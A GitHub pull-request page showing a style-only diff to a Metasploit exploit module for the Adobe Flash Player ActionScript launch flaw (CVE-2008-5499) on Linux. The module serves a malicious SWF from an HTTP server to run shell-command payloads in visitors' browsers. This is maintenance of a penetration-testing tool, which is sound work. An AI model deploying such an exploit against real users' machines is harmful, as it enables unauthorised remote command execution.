Skip to content

modules/exploits/linux/browser: Resolve RuboCop violations #20165

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
wants to merge 2 commits into
base: master
Choose a base branch
from
Open

modules/exploits/linux/browser: Resolve RuboCop violations #20165

Changes from all commits
Commits
Show all changes
2 commits
Select commit Hold shift + click to select a range
5062f59
modules/exploits/linux/browser: Resolve RuboCop violations
bcoles May 10, 2025
71565c6
Update modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb
jheysel-r7 May 16, 2025
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
54 changes: 28 additions & 26 deletions modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -9,9 +9,11 @@ class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpServer::HTML

def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe Flash Player ActionScript Launch Command Execution Vulnerability',
'Description' => %q{
super(
update_info(
info,
'Name' => 'Adobe Flash Player ActionScript Launch Command Execution Vulnerability',
'Description' => %q{
This module exploits a vulnerability in Adobe Flash Player for Linux,
version 10.0.12.36 and 9.0.151.0 and prior.
An input validation vulnerability allows command execution when the browser
Expand All @@ -21,49 +23,49 @@ def initialize(info = {})
The victim must have Adobe AIR installed for the exploit to work. This module
was tested against version 10.0.12.36 (10r12_36).
},
'License' => MSF_LICENSE,
'Author' =>
[
'License' => MSF_LICENSE,
'Author' => [
'0a29406d9794e4f9b30b3c5d6702c708', # Metasploit version
],
'References' =>
[
'References' => [
['CVE', '2008-5499'],
['OSVDB', '50796'],
['BID', '32896'],
['URL', 'http://www.adobe.com/support/security/bulletins/apsb08-24.html']
],
'DefaultOptions' =>
{
'DefaultOptions' => {
'HTTP::compression' => 'gzip',
'HTTP::chunked' => true
'HTTP::chunked' => true
},
'Platform' => 'unix', # so unix cmd exec payloads are ok
'Arch' => ARCH_CMD,
'Targets' =>
[
'Platform' => 'unix', # so unix cmd exec payloads are ok
'Arch' => ARCH_CMD,
'Targets' => [
[ 'Automatic', {}],
],
'DisclosureDate' => '2008-12-17',
'DefaultTarget' => 0))

'DisclosureDate' => '2008-12-17',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SERVICE_DOWN],
'SideEffects' => [],
'Reliability' => [REPEATABLE_SESSION]
}
)
)
end

def exploit
path = File.join( Msf::Config.data_directory, "exploits", "CVE-2008-5499.swf" )
fd = File.open( path, "rb" )
@swf = fd.read(fd.stat.size)
fd.close
path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2008-5499.swf')
@swf = File.binread(path)

super
end

def on_request_uri(cli, request)
msg = "#{cli.peerhost.ljust(16)} #{self.shortname}"
msg = "#{cli.peerhost.ljust(16)} #{shortname}"
trigger = @swf
trigger_file = rand_text_alpha(rand(6)+3) + ".swf"
trigger_file = rand_text_alpha(3..8) + '.swf'

obj_id = rand_text_alpha(rand(6)+3)
obj_id = rand_text_alpha(3..8)

if request.uri.match(/\.swf/i)
print_status("#{msg} Sending Exploit SWF")
Expand All @@ -76,7 +78,7 @@ def on_request_uri(cli, request)
return
end

html = <<-EOS
html = <<-EOS
<html>
<head>
</head>
Expand Down
Loading